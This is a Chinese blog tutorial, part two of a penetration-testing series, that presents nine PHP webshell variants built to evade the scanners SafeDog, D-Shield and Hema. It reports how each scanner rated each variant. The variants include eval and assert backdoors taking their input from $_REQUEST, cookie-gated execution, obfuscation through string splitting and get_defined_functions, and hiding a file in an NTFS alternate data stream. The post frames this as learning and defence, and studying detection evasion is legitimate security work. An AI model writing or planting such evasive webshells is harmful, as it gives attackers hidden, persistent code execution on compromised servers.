热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

渗透测试基础bypass绕过阻挡我们的WAF(下)

渗透测试基础-bypass

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)

    • 简介
    • 前期测试原理
    • 方法一 (end函数)
    • 方法二 (定义常量)
    • 方法三 (字符串拼接 + 双美元符)
    • 方法四 (强行分割)
    • 方法五 (魔术方法执行)
    • 方法六 (COOKIE传参加入条件)
    • 方法七 (get_defined_functions)
    • 方法八 (远程获取)
    • 方法九 (CMD藏文件之NTFS文件流)
    • 漏洞总结

只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力?!

请进行合法的渗透测试,有关内容只是用作个人复习。

简介

上次介绍了如何绕过安全狗的测试语句检测,这次将介绍,在得到webshell权限后,如何让自己的木马文件不会被发现并删除。以webshell查杀来说,安全狗确实差了点意思,稍微对语句做一点变动,安全狗就不能有效的识别,所以这里会在多加入两个webshell检测工具,进行同步测试。【在正常的渗透测试中,是不需要做到让咱们的木马达到不被发现并删除的情况,所以我们这里还是以学习为主,当安全工具检测到恶意文件并无法确定是不是木马文件时,这就需要我们来进行评判了

三个webshell查杀工具下载地址:
【安全狗】:http://free.safedog.cn/website_safedog.html
【D盾】:http://www.d99net.net/News.asp?id=62
【河马】:https://www.shellpub.com

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

前期测试原理

在这里插入图片描述
在网站目录下留下一个较为常见的一句话木马文件,然后和网站安全狗配合测试。
在这里插入图片描述
安全狗一下就找到了它的存在,那这样是不行的,总不能刚刚放了一个文件进去就被发现了吧,那可太拉跨了,所以我们得对其进行一下测试,看看安全狗到底是因为什么而发现的它。

在这里插入图片描述
在这里插入图片描述
在删除了$_REQUEST后面的中括号之后,发现安全狗好像没有认为其是木马文件了,所以这里是对中括号进行了拦截嘛?在测试一下前面的eval试试。
在这里插入图片描述
在这里插入图片描述

发现这样也是不拦截的,所以我们能不能采用替换的方法先试试呢?
eval是可以被assert所代替的,这个下面有例子能讲解。
那中括号呢有没有办法让其既不出现,但是这个文件又能达到木马的作用呢?

方法一 (end函数)

eval(end($_REQUEST));?>

在这里插入图片描述
根据了解知道 函数end()就是输出数组中最后一个值的,那这里的$_REQUEST刚刚好接收到的数据就是数组的形式。
在这里插入图片描述

eval(end($_REQUEST));?>

所以这里end来获取$_REQUEST的值,然后再次给eval执行,既不用写刚刚的中括号,又让其能执行,这里来测试一下。
在这里插入图片描述
这里测试使用是没有问题的 拿到安全狗检测一下。
在这里插入图片描述
安全狗说自己没有发现,那这样就逃过了安全狗的检测。能过安全狗还不行,咱们再试试D盾和河马。
在这里插入图片描述
在这里插入图片描述

能看到河马也没有查出来,只有D盾能检测到。

方法二 (定义常量)

define("a","$_REQUEST[a]");eval(a);?>

在这里插入图片描述
定义常量 define常量的名字常量的值),a的值,就是$_REQUEST[a]接收到的值,然后在后面eval执行。

在这里插入图片描述
执行没问题,三个软件检查一下。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁4级【1-5级,5级紧急】

方法三 (字符串拼接 + 双美元符)


$a = 'ass';
$b = 'ert';
$funcName = $a.$b;
$x = 'funcName';
$$x($_REQUEST[a]);
?>

这里就将eval替换为了assert,因为eval禁止拼接执行,所以这里只有assert才能这么玩

assert拆开了,分别赋值给 $a 和 $b ,然后下面将其拼接回来,并将assert字符串值赋值给了$funcName,然后$x = 字符串的funcName,下面是双美元符号,因为$x == funName$funcName == assert 所以最后的结果就是assert($_REQUEST[a])
在这里插入图片描述

正常使用,还是用webshell工具查杀一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗()【安全狗这小子,成绩一直很稳定】
河马(检测到威胁
D盾(检查到威胁3级相比于刚才降低了一级

方法四 (强行分割)


function a($a){
return $a;
}
eval(a($_REQUEST)[a]);
?>

这里自定义一个叫a的函数,括号里面放入$a,下面是return 返回$a的值,这里就是,往$a里面传什么进去,就会返回什么回来。eval执行(函数a想要将$_REQUEST传入进去,然后返回回来一个$_REQUEST,然后就形成了eval($_REQUEST['a']))

在这里插入图片描述
正常使用,webshell工具检测一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁5级)【D盾这小子打小就聪明】

方法五 (魔术方法执行)


class User{
public $name = '';
function __destruct(){
eval("$this->name");
}
}
$user = new User;
$user->name = ''.$_REQUEST['a'];
?>

  1. 定义一个叫User的类
  2. 声明一个name公有变量 但是没有给其赋值
  3. 定义一个魔术方法,__destruct()的意思是当对象被销毁时执行【一定会执行的,因为一定会销毁】
    在这里插入图片描述
  4. 销毁时执行eval("$this->name");这里也是还没有跟name赋值
  5. User类实体化
  6. 将得到的值放入name中,然后放到上面的eval执行。
    在这里插入图片描述
    正常使用,webshell工具查杀一下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁5级)【该买谁 现在知道了吧】

方法六 (COOKIE传参加入条件)


$COOKIE = $_COOKIE;
foreach( $COOKIE as $key => $value)
{
if($key=='assert'){
$key($_REQUEST['a']);
}
}
?>

先获取COOKIE值,将COOKIE的值放入$COOKIE中,因为COOKIE获取到的值是数组形式,所以这里用foreach进行结果遍历,将结果和值,分别放入$key$value 中【键值分离】。然后if条件判断,当COOKIE中键等于assert时,拿着$key去执行$_REQUEST传入过来值。

在这里插入图片描述

COOKIE不传入assert 是不能正常执行的
继续测试查杀软件的成绩
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

安全狗(
河马(检测到威胁
D盾(检查到威胁2级

方法七 (get_defined_functions)


$a = get_defined_functions();
$a[internal][841]($_REQUEST['a']);
?>

这里开局就遇到一个不认识的东西,我们看看是啥
在这里插入图片描述
在这里插入图片描述
那前面的数字是什么意思呢,输出一下看看。
在这里插入图片描述
那这样就好理解了,get_defined_functions()将得到的数据全部放入$a中,然后用$a[internal][841]去检索里面的值,将assert给取出来,和后面的($_REQUEST['a'])相结合使用。【不得不说,想出这个的老哥还是秀的呀】
在这里插入图片描述
查杀软件的成绩
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗()【专业陪跑】
河马(
D盾(检查到威胁2级)【全靠友商衬托 哈哈】

方法八 (远程获取)


'''
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('
127.0.0.1','root','root','mysql_database','post'),'select * from jinx'))['info'])
'
''
?>

这里有三个函数,一个个了解一下
mysqli_fetch_assoc:就是从结果里面取一行数据
在这里插入图片描述

mysqli_query:这个一下连下面那个的意思也解释了,第一个做链接,第二个是查询
在这里插入图片描述

mysqli_connect:链接数据库

那这样就好解释了
执行(取一行数据(查点数据(链接数据库,取出表jinx里面的所有数据))【查询的条件:info字段】)
在这里插入图片描述
在配上这样一个图,就大功告成。
也测试一下。
在这里插入图片描述
webshell查杀一下。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(检测出威胁)【ohhhhhhhhhh】
河马()【小丑竟是我自己】
D盾(检查到威胁5级)【基操勿6】

方法九 (CMD藏文件之NTFS文件流)

【网站目录下存放文件】
【网站目录下打开CMD】 echo "" >> /:123.txt

在这里插入图片描述
在这里插入图片描述
执行完了之后好像什么都没有发生,但其实已经完成了。
在这里插入图片描述
最后再来看看测试结果。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(

在这里插入图片描述

漏洞总结

本次介绍的这些方法都还算比较实用的,如果在现实中有遇到安全软件吃不准的情况下,个人就可以做一下判断,来确定是不是木马文件。

《最好的防御,是明白其怎么实施的攻击》


推荐阅读
  • Monkey《大话移动——Android与iOS应用测试指南》的预购信息发布啦!
    Monkey《大话移动——Android与iOS应用测试指南》的预购信息已经发布,可以在京东和当当网进行预购。感谢几位大牛给出的书评,并呼吁大家的支持。明天京东的链接也将发布。 ... [详细]
  • 本文介绍了使用Java实现大数乘法的分治算法,包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]
  • 如何提高PHP编程技能及推荐高级教程
    本文介绍了如何提高PHP编程技能的方法,推荐了一些高级教程。学习任何一种编程语言都需要长期的坚持和不懈的努力,本文提醒读者要有足够的耐心和时间投入。通过实践操作学习,可以更好地理解和掌握PHP语言的特异性,特别是单引号和双引号的用法。同时,本文也指出了只走马观花看整体而不深入学习的学习方式无法真正掌握这门语言,建议读者要从整体来考虑局部,培养大局观。最后,本文提醒读者完成一个像模像样的网站需要付出更多的努力和实践。 ... [详细]
  • Android实战——jsoup实现网络爬虫,糗事百科项目的起步
    本文介绍了Android实战中使用jsoup实现网络爬虫的方法,以糗事百科项目为例。对于初学者来说,数据源的缺乏是做项目的最大烦恼之一。本文讲述了如何使用网络爬虫获取数据,并以糗事百科作为练手项目。同时,提到了使用jsoup需要结合前端基础知识,以及如果学过JS的话可以更轻松地使用该框架。 ... [详细]
  • 单页面应用 VS 多页面应用的区别和适用场景
    本文主要介绍了单页面应用(SPA)和多页面应用(MPA)的区别和适用场景。单页面应用只有一个主页面,所有内容都包含在主页面中,页面切换快但需要做相关的调优;多页面应用有多个独立的页面,每个页面都要加载相关资源,页面切换慢但适用于对SEO要求较高的应用。文章还提到了两者在资源加载、过渡动画、路由模式和数据传递方面的差异。 ... [详细]
  • 本文介绍了一种图的存储和遍历方法——链式前向星法,该方法在存储带边权的图时时间效率比vector略高且节省空间。然而,链式前向星法存图的最大问题是对一个点的出边进行排序去重不容易,但在平行边无所谓的情况下选择这个方法是非常明智的。文章还提及了图中搜索树的父子关系一般不是很重要,同时给出了相应的代码示例。 ... [详细]
  • 判断编码是否可立即解码的程序及电话号码一致性判断程序
    本文介绍了两个编程题目,一个是判断编码是否可立即解码的程序,另一个是判断电话号码一致性的程序。对于第一个题目,给出一组二进制编码,判断是否存在一个编码是另一个编码的前缀,如果不存在则称为可立即解码的编码。对于第二个题目,给出一些电话号码,判断是否存在一个号码是另一个号码的前缀,如果不存在则说明这些号码是一致的。两个题目的解法类似,都使用了树的数据结构来实现。 ... [详细]
  • 【爬虫】关于企业信用信息公示系统加速乐最新反爬虫机制
    ( ̄▽ ̄)~又得半夜修仙了,作为一个爬虫小白,花了3天时间写好的程序,才跑了一个月目标网站就更新了,是有点悲催,还是要只有一天的时间重构。升级后网站的层次结构并没有太多变化,表面上 ... [详细]
  • java程序设计试题_《Java语言程序设计》期末考试模拟试题——填空题和编程题...
    一、根据题意,填写出空格中的内容Java平台包括三个技术方向,其中J2ME代表____________、J2SE代表___________、J2EE代表 ... [详细]
  • ①页面初始化----------收到客户端的请求,产生相应页面的Page对象,通过Page_Init事件进行page对象及其控件的初始化.②加载视图状态-------ViewSta ... [详细]
  • 前言:关于跨域CORS1.没有跨域时,ajax默认是带cookie的2.跨域时,两种解决方案:1)服务器端在filter中配置详情:http:blog.csdn.netwzl002 ... [详细]
  • 篇首语:本文由编程笔记#小编为大家整理,主要介绍了在插入,更新或删除操作期间,在实体上找不到属性?相关的知识,希望对你有一定的参考价值。 ... [详细]
  • 本文介绍了Web开发人员的输出缓冲的概念和优势,以及如何使用输出缓冲来减少下载和呈现HTML所需的时间。同时,还解决了在设置Cookie时可能遇到的问题。初学者可以通过使用输出缓冲将整个HTML页面作为一个变量来处理,从而更好地掌握Web开发。 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
  • .NetCoreWebApi生成Swagger接口文档的使用方法
    本文介绍了使用.NetCoreWebApi生成Swagger接口文档的方法,并详细说明了Swagger的定义和功能。通过使用Swagger,可以实现接口和服务的可视化,方便测试人员进行接口测试。同时,还提供了Github链接和具体的步骤,包括创建WebApi工程、引入swagger的包、配置XML文档文件和跨域处理。通过本文,读者可以了解到如何使用Swagger生成接口文档,并加深对Swagger的理解。 ... [详细]
author-avatar
禅茶一味2502922807_527
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有